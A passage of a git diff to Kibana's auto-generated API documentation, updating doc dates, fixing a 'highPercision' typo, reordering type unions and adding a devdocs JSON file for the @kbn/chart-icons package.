undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }> | undefined; readonly artifacts?: Readonly<{ application?: Readonly<{} & { path: string; label: string; }> | undefined; exportedFields?: Readonly<{} & { documentationUrl: string; }> | undefined; } & { dashboards: Readonly<{ linkLabel?: string | undefined; } & { id: string; isOverview: boolean; }>[]; }> | undefined; readonly savedObjectsInstallMsg?: string | undefined; readonly customStatusCheckName?: string | undefined; readonly integrationBrowserCategories?: string[] | undefined; readonly eprPackageOverlap?: string | undefined; readonly id: string; readonly name: string; readonly category: \"other\" | \"security\" | \"metrics\" | \"logging\"; readonly shortDescription: string; readonly longDescription: string; readonly onPrem: Readonly<{ params?: Readonly<{ defaultValue?: any; } & { type: \"string\" | \"number\"; label: string; id: string; }>[] | undefined; } & { instructionSets: Readonly<{ title?: string | undefined; callOut?: Readonly<{ message?: string | undefined; iconType?: string | undefined; } & { title: string; }> | undefined; statusCheck?: Readonly<{ error?: string | undefined; success?: string | undefined; text?: string | undefined; title?: string | undefined; btnLabel?: string | undefined; } & { esHitsCheck: Readonly<{} & { query: Record; index: string | string[]; }>; }> | undefined; } & { instructionVariants: Readonly<{ initialSelected?: boolean | undefined; } & { id: string; instructions: Readonly<{ title?: string | undefined; commands?: string[] | undefined; textPre?: string | undefined; textPost?: string | undefined; customComponentName?: string | undefined; } & {}>[]; }>[]; }>[]; }>; }" ], "path": "src/plugins/home/server/services/tutorials/lib/tutorial_schema.ts", "deprecated": false, @@ -2021,7 +2021,7 @@ "signature": [ "{ getSampleDatasets: () => ", "Writable", - "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>[]; addSavedObjectsToSampleDataset: (id: string, savedObjects: ", + "[]; previewImagePath: string; overviewDashboard: string; defaultIndex: string; dataIndices: Readonly<{} & { id: string; fields: Record; timeFields: string[]; dataPath: string; currentTimeMarker: string; preserveDayOfWeekTimeOfDay: boolean; }>[]; }>>[]; addSavedObjectsToSampleDataset: (id: string, savedObjects: ", "SavedObject", "[]) => void; addAppLinksToSampleDataset: (id: string, appLinks: ", { diff --git a/api_docs/home.mdx b/api_docs/home.mdx index a147691a629d6..013c15505f037 100644 --- a/api_docs/home.mdx +++ b/api_docs/home.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/home title: "home" image: https://source.unsplash.com/400x175/?github description: API docs for the home plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'home'] --- import homeObj from './home.devdocs.json'; diff --git a/api_docs/index_lifecycle_management.mdx b/api_docs/index_lifecycle_management.mdx index 82e7e378ab7de..0a2ad674489bc 100644 --- a/api_docs/index_lifecycle_management.mdx +++ b/api_docs/index_lifecycle_management.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/indexLifecycleManagement title: "indexLifecycleManagement" image: https://source.unsplash.com/400x175/?github description: API docs for the indexLifecycleManagement plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'indexLifecycleManagement'] --- import indexLifecycleManagementObj from './index_lifecycle_management.devdocs.json'; diff --git a/api_docs/index_management.mdx b/api_docs/index_management.mdx index 4ea15b9efa4e1..9ee4a784b6c61 100644 --- a/api_docs/index_management.mdx +++ b/api_docs/index_management.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/indexManagement title: "indexManagement" image: https://source.unsplash.com/400x175/?github description: API docs for the indexManagement plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'indexManagement'] --- import indexManagementObj from './index_management.devdocs.json'; diff --git a/api_docs/infra.devdocs.json b/api_docs/infra.devdocs.json index d9ee7fb6b4497..9fb1cc6dedd69 100644 --- a/api_docs/infra.devdocs.json +++ b/api_docs/infra.devdocs.json @@ -265,10 +265,10 @@ }, { "parentPluginId": "infra", - "id": "def-public.FORMATTERS.highPercision", + "id": "def-public.FORMATTERS.highPrecision", "type": "Function", "tags": [], - "label": "highPercision", + "label": "highPrecision", "description": [], "signature": [ "(val: number) => string" @@ -279,7 +279,7 @@ "children": [ { "parentPluginId": "infra", - "id": "def-public.FORMATTERS.highPercision.$1", + "id": "def-public.FORMATTERS.highPrecision.$1", "type": "number", "tags": [], "label": "val", diff --git a/api_docs/infra.mdx b/api_docs/infra.mdx index 00a25a8375163..9d1388b056cab 100644 --- a/api_docs/infra.mdx +++ b/api_docs/infra.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/infra title: "infra" image: https://source.unsplash.com/400x175/?github description: API docs for the infra plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'infra'] --- import infraObj from './infra.devdocs.json'; diff --git a/api_docs/inspector.mdx b/api_docs/inspector.mdx index 088e3954cbc03..24b59fa61ecf2 100644 --- a/api_docs/inspector.mdx +++ b/api_docs/inspector.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/inspector title: "inspector" image: https://source.unsplash.com/400x175/?github description: API docs for the inspector plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'inspector'] --- import inspectorObj from './inspector.devdocs.json'; diff --git a/api_docs/interactive_setup.mdx b/api_docs/interactive_setup.mdx index 3beb05f2aa55f..9b11c63613ce6 100644 --- a/api_docs/interactive_setup.mdx +++ b/api_docs/interactive_setup.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/interactiveSetup title: "interactiveSetup" image: https://source.unsplash.com/400x175/?github description: API docs for the interactiveSetup plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'interactiveSetup'] --- import interactiveSetupObj from './interactive_setup.devdocs.json'; diff --git a/api_docs/kbn_ace.mdx b/api_docs/kbn_ace.mdx index 954d2f0a0ca45..e510437eda12a 100644 --- a/api_docs/kbn_ace.mdx +++ b/api_docs/kbn_ace.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ace title: "@kbn/ace" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ace plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ace'] --- import kbnAceObj from './kbn_ace.devdocs.json'; diff --git a/api_docs/kbn_aiops_components.mdx b/api_docs/kbn_aiops_components.mdx index 89c1b200aea44..a585502c902e4 100644 --- a/api_docs/kbn_aiops_components.mdx +++ b/api_docs/kbn_aiops_components.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-aiops-components title: "@kbn/aiops-components" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/aiops-components plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/aiops-components'] --- import kbnAiopsComponentsObj from './kbn_aiops_components.devdocs.json'; diff --git a/api_docs/kbn_aiops_utils.mdx b/api_docs/kbn_aiops_utils.mdx index dd3f6a4daff9a..cf3880109c7f3 100644 --- a/api_docs/kbn_aiops_utils.mdx +++ b/api_docs/kbn_aiops_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-aiops-utils title: "@kbn/aiops-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/aiops-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/aiops-utils'] --- import kbnAiopsUtilsObj from './kbn_aiops_utils.devdocs.json'; diff --git a/api_docs/kbn_alerts.mdx b/api_docs/kbn_alerts.mdx index e13280df8c109..d70a441d20a64 100644 --- a/api_docs/kbn_alerts.mdx +++ b/api_docs/kbn_alerts.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-alerts title: "@kbn/alerts" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/alerts plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/alerts'] --- import kbnAlertsObj from './kbn_alerts.devdocs.json'; diff --git a/api_docs/kbn_analytics.mdx b/api_docs/kbn_analytics.mdx index f474a9b6b4262..4ee91d6535580 100644 --- a/api_docs/kbn_analytics.mdx +++ b/api_docs/kbn_analytics.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics title: "@kbn/analytics" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics'] --- import kbnAnalyticsObj from './kbn_analytics.devdocs.json'; diff --git a/api_docs/kbn_analytics_client.devdocs.json b/api_docs/kbn_analytics_client.devdocs.json index a2543aacc179c..4bf4b8891da73 100644 --- a/api_docs/kbn_analytics_client.devdocs.json +++ b/api_docs/kbn_analytics_client.devdocs.json @@ -1760,7 +1760,7 @@ "Types matching string values" ], "signature": [ - "\"text\" | \"date\" | \"keyword\"" + "\"date\" | \"keyword\" | \"text\"" ], "path": "packages/analytics/client/src/schema/types.ts", "deprecated": false, @@ -1776,7 +1776,7 @@ "\nPossible type values in the schema" ], "signature": [ - "\"boolean\" | \"text\" | \"date\" | \"keyword\" | \"long\" | \"double\" | \"short\" | \"float\" | \"integer\" | \"byte\"" + "\"boolean\" | \"date\" | \"keyword\" | \"text\" | \"long\" | \"double\" | \"short\" | \"float\" | \"integer\" | \"byte\"" ], "path": "packages/analytics/client/src/schema/types.ts", "deprecated": false, diff --git a/api_docs/kbn_analytics_client.mdx b/api_docs/kbn_analytics_client.mdx index e46ec8be1113e..0b514021a1a52 100644 --- a/api_docs/kbn_analytics_client.mdx +++ b/api_docs/kbn_analytics_client.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics-client title: "@kbn/analytics-client" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics-client plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics-client'] --- import kbnAnalyticsClientObj from './kbn_analytics_client.devdocs.json'; diff --git a/api_docs/kbn_analytics_shippers_elastic_v3_browser.mdx b/api_docs/kbn_analytics_shippers_elastic_v3_browser.mdx index 20b2caacae4bd..c51597e2396c8 100644 --- a/api_docs/kbn_analytics_shippers_elastic_v3_browser.mdx +++ b/api_docs/kbn_analytics_shippers_elastic_v3_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics-shippers-elastic-v3-browser title: "@kbn/analytics-shippers-elastic-v3-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics-shippers-elastic-v3-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics-shippers-elastic-v3-browser'] --- import kbnAnalyticsShippersElasticV3BrowserObj from './kbn_analytics_shippers_elastic_v3_browser.devdocs.json'; diff --git a/api_docs/kbn_analytics_shippers_elastic_v3_common.mdx b/api_docs/kbn_analytics_shippers_elastic_v3_common.mdx index ed9b65baaa7b4..1e68519814189 100644 --- a/api_docs/kbn_analytics_shippers_elastic_v3_common.mdx +++ b/api_docs/kbn_analytics_shippers_elastic_v3_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics-shippers-elastic-v3-common title: "@kbn/analytics-shippers-elastic-v3-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics-shippers-elastic-v3-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics-shippers-elastic-v3-common'] --- import kbnAnalyticsShippersElasticV3CommonObj from './kbn_analytics_shippers_elastic_v3_common.devdocs.json'; diff --git a/api_docs/kbn_analytics_shippers_elastic_v3_server.mdx b/api_docs/kbn_analytics_shippers_elastic_v3_server.mdx index 635578447e2df..4582e1f40f686 100644 --- a/api_docs/kbn_analytics_shippers_elastic_v3_server.mdx +++ b/api_docs/kbn_analytics_shippers_elastic_v3_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics-shippers-elastic-v3-server title: "@kbn/analytics-shippers-elastic-v3-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics-shippers-elastic-v3-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics-shippers-elastic-v3-server'] --- import kbnAnalyticsShippersElasticV3ServerObj from './kbn_analytics_shippers_elastic_v3_server.devdocs.json'; diff --git a/api_docs/kbn_analytics_shippers_fullstory.mdx b/api_docs/kbn_analytics_shippers_fullstory.mdx index cbe1e50d88168..d646b6198ed68 100644 --- a/api_docs/kbn_analytics_shippers_fullstory.mdx +++ b/api_docs/kbn_analytics_shippers_fullstory.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-analytics-shippers-fullstory title: "@kbn/analytics-shippers-fullstory" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/analytics-shippers-fullstory plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/analytics-shippers-fullstory'] --- import kbnAnalyticsShippersFullstoryObj from './kbn_analytics_shippers_fullstory.devdocs.json'; diff --git a/api_docs/kbn_apm_config_loader.mdx b/api_docs/kbn_apm_config_loader.mdx index 276fa03de2919..43fd4a9d534ad 100644 --- a/api_docs/kbn_apm_config_loader.mdx +++ b/api_docs/kbn_apm_config_loader.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-apm-config-loader title: "@kbn/apm-config-loader" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/apm-config-loader plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/apm-config-loader'] --- import kbnApmConfigLoaderObj from './kbn_apm_config_loader.devdocs.json'; diff --git a/api_docs/kbn_apm_utils.mdx b/api_docs/kbn_apm_utils.mdx index d6afbdaebb974..bc47cd4d28f90 100644 --- a/api_docs/kbn_apm_utils.mdx +++ b/api_docs/kbn_apm_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-apm-utils title: "@kbn/apm-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/apm-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/apm-utils'] --- import kbnApmUtilsObj from './kbn_apm_utils.devdocs.json'; diff --git a/api_docs/kbn_axe_config.mdx b/api_docs/kbn_axe_config.mdx index 8346f2ef37977..e9b647c4b14ca 100644 --- a/api_docs/kbn_axe_config.mdx +++ b/api_docs/kbn_axe_config.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-axe-config title: "@kbn/axe-config" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/axe-config plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/axe-config'] --- import kbnAxeConfigObj from './kbn_axe_config.devdocs.json'; diff --git a/api_docs/kbn_bazel_packages.mdx b/api_docs/kbn_bazel_packages.mdx index eeccaac398aa1..9290085ef03b2 100644 --- a/api_docs/kbn_bazel_packages.mdx +++ b/api_docs/kbn_bazel_packages.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-bazel-packages title: "@kbn/bazel-packages" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/bazel-packages plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/bazel-packages'] --- import kbnBazelPackagesObj from './kbn_bazel_packages.devdocs.json'; diff --git a/api_docs/kbn_chart_icons.devdocs.json b/api_docs/kbn_chart_icons.devdocs.json new file mode 100644 index 0000000000000..aad32da9e7286 --- /dev/null +++ b/api_docs/kbn_chart_icons.devdocs.json @@ -0,0 +1,1253 @@ +{ + "id": "@kbn/chart-icons", + "client": { + "classes": [], + "functions": [], + "interfaces": [], + "enums": [], + "misc": [], + "objects": [] + }, + "server": { + "classes": [], + "functions": [], + "interfaces": [], + "enums": [], + "misc": [], + "objects": [] + }, + "common": { + "classes": [], + "functions": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.DropIllustration", + "type": "Function", + "tags": [], + "label": "DropIllustration", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/drop_illustration.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.DropIllustration.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/drop_illustration.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisBottom", + "type": "Function", + "tags": [], + "label": "EuiIconAxisBottom", + "description": [], + "signature": [ + "({ title, titleId, ...props }: { title: string; titleId: string; }) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/axis_bottom.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisBottom.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_bottom.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisBottom.$1.title", + "type": "string", + "tags": [], + "label": "title", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_bottom.tsx", + "deprecated": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisBottom.$1.titleId", + "type": "string", + "tags": [], + "label": "titleId", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_bottom.tsx", + "deprecated": false + } + ] + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisLeft", + "type": "Function", + "tags": [], + "label": "EuiIconAxisLeft", + "description": [], + "signature": [ + "({ title, titleId, ...props }: { title: string; titleId: string; }) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/axis_left.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisLeft.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_left.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisLeft.$1.title", + "type": "string", + "tags": [], + "label": "title", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_left.tsx", + "deprecated": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisLeft.$1.titleId", + "type": "string", + "tags": [], + "label": "titleId", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_left.tsx", + "deprecated": false + } + ] + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisRight", + "type": "Function", + "tags": [], + "label": "EuiIconAxisRight", + "description": [], + "signature": [ + "({ title, titleId, ...props }: { title: string; titleId: string; }) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/axis_right.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisRight.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_right.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisRight.$1.title", + "type": "string", + "tags": [], + "label": "title", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_right.tsx", + "deprecated": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisRight.$1.titleId", + "type": "string", + "tags": [], + "label": "titleId", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_right.tsx", + "deprecated": false + } + ] + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisTop", + "type": "Function", + "tags": [], + "label": "EuiIconAxisTop", + "description": [], + "signature": [ + "({ title, titleId, ...props }: { title: string; titleId: string; }) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/axis_top.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisTop.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_top.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisTop.$1.title", + "type": "string", + "tags": [], + "label": "title", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_top.tsx", + "deprecated": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconAxisTop.$1.titleId", + "type": "string", + "tags": [], + "label": "titleId", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/axis_top.tsx", + "deprecated": false + } + ] + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconLegend", + "type": "Function", + "tags": [], + "label": "EuiIconLegend", + "description": [], + "signature": [ + "({ title, titleId, ...props }: { title: string; titleId: string; }) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/legend.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconLegend.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/legend.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconLegend.$1.title", + "type": "string", + "tags": [], + "label": "title", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/legend.tsx", + "deprecated": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.EuiIconLegend.$1.titleId", + "type": "string", + "tags": [], + "label": "titleId", + "description": [], + "path": "packages/kbn-chart-icons/src/assets/legend.tsx", + "deprecated": false + } + ] + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.GlobeIllustration", + "type": "Function", + "tags": [], + "label": "GlobeIllustration", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/globe_illustration.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.GlobeIllustration.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/globe_illustration.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartArea", + "type": "Function", + "tags": [], + "label": "IconChartArea", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartArea.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartAreaPercentage", + "type": "Function", + "tags": [], + "label": "IconChartAreaPercentage", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area_percentage.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartAreaPercentage.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area_percentage.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartAreaStacked", + "type": "Function", + "tags": [], + "label": "IconChartAreaStacked", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area_stacked.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartAreaStacked.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area_stacked.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBar", + "type": "Function", + "tags": [], + "label": "IconChartBar", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBar.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarAnnotations", + "type": "Function", + "tags": [], + "label": "IconChartBarAnnotations", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_annotations.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarAnnotations.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_annotations.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontal", + "type": "Function", + "tags": [], + "label": "IconChartBarHorizontal", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontal.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontalPercentage", + "type": "Function", + "tags": [], + "label": "IconChartBarHorizontalPercentage", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal_percentage.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontalPercentage.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal_percentage.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontalStacked", + "type": "Function", + "tags": [], + "label": 